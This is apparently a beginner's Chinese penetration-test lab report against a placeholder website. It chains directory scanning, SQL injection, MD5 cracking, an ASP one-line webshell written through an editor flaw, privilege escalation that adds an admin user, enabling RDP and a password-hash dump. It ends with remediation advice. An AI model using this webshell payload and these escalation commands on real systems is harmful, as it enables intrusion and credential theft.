初次编写渗透实验报告

一、概述

1.1测试目的

通过实施针对性的渗透测试,获取到目标服务器的权限

1.2测试范围

系统名称 测试网站
测试域名 wwwxxxx.com
测试时间 2017.11.20

1.3数据来源

通过漏洞扫描和手动分析获取相关数据

二、详细测试结果

2.1、测试工具

检测工具 用途与说明
御剑 扫描后台目录
明小子 扫描sql注入漏洞
中国菜刀 连接小马,相当于浏览器,方便管理目录
PR 提权
cmd.exe 提供执行系统命令的环境
3389.bar 用于开启3389端口
quartspwdump 哈希扫描本机用户密码
其他 系统本身具备的相关命令,或者根据实际情况采用的其他工具

2.2、测试步骤

  1. 预扫描

    访问网站,查看初步观察网站信息

  2. 工具扫描

    采用御剑扫描后台目录,找出后台登陆页面

  3. 人工分析检测扫描结果
    初次编写渗透实验报告_第1张图片
    对以上扫描结果进行手动验证,判断扫描结果中是否存在后台登陆页面。找到后台后需要判断后台用户名和密码,有三种方式去获得:
    暴力破解、找sql注入、xss获取管理员cookie
    这里我们不知道用户名也不知道密码破解起来比较麻烦,而xss获取cookie也不现实,所以就选择去寻找sql注入

  4. 明小子扫描sql漏洞

    • 扫描网站存在的注入点
      初次编写渗透实验报告_第2张图片
    • 扫描注入点
      初次编写渗透实验报告_第3张图片
    • md5解密
      初次编写渗透实验报告_第4张图片
    • 登陆后台
      初次编写渗透实验报告_第5张图片
    • 浏览后台网站,找上传点,拿到webshell

      可以在网站中寻找上传点,或查看网站是否存在编辑器,有上传点就上传文件根据他的限制条件采用相应的绕过方式。如果有编辑器,下载对应源代码,查看他对输入有什么限制,并查看写入文件存在于那个路径
      这里采用编辑器漏洞,因为我们查看了源文件发现他对输入未作任何限制,而且存放路径我们也扫描出来了,所以就去构造asp语句,写入asp一句话木马”%><%eavl request(‘cd’)%><%’构造时要注意闭合前后语句,然后我们就拿到webshell了
      注:asp单行注释用’

    • 中国菜刀连接一句话木马
      初次编写渗透实验报告_第6张图片
      连接成功后才看当前cmd是否能执行命令,并且查看当前用户权限;如果不能执行命令,以及用户权限过低,我们就需要上传一个cmd并且提权

    • PR提权
      上传两个工具(cmd、pr)到菜刀上,然后使用我们上传的cmd(右击打开虚拟终端)执行命令 :
pr  “net user test test1234 /add”(添加用户)
pr  "net localgroup administartors test /add"(将新用户添加进管理员组)
net  user(查看用户信息)
  • 打开3389,实现远程连接
    上传3389.bar到菜刀上,然后执行命令:
pr  “3389”(打开3389)
netstat -an(才看端口开放情况)
  • quartspwdump获取目标服务器管理密码
    通过将quartspwdump工具上传到菜刀,然后在登陆远程桌面,打开命令行执行命令:
quartspwdump  --dump-hash-local  --output “输出路径”

得到哈希密码,然后去解密网站解密最终得到服务器管理员密码,完成!

2.3、 测试结果分析

此次测试发现的网站漏洞包括:

  • 管理后台
风险等级:
  低
漏洞描述:
  用户能通过工具扫描,获取到后台登陆地址
漏洞位置:
  www.xxxx.com/admin/login.asp
整改意见:
  修改管理后台url
  • sql注入漏洞
风险等级:
  高
漏洞描述:
  用户可以通过sql注入工具,对网站进行扫描并找到注入点,最后成功注入,获取到管理员的用户名和密码。进入后台
漏洞位置:
  www.xxxx.com\shownews\?id=
  变量:id
整改建议:
  1、使用在线防护产品
  2、对相关字段进行过滤
  3、参数化查询数据库
  • 编辑器漏洞
风险等级:
  高
漏洞描述:
  用户可以随意构造asp语句,通过扫描出的地址,使用菜刀连接写入的木马
漏洞位置:
  网站管理信息模块
整改意见:
  修改编辑器源文件,对用户输入做出限制,对上传路径中文件夹的权限做出限制,使用户能上传但无法执行

2.4、整体修改意见

  1. 修改后台登陆url
  2. 修改管理员用户和密码
  3. 登陆增加验证码
  4. 修补编辑器漏洞,增加上传的安全性
  5. 增加系统补丁,降低用户提权成功概率

你可能感兴趣的:(笔记整理)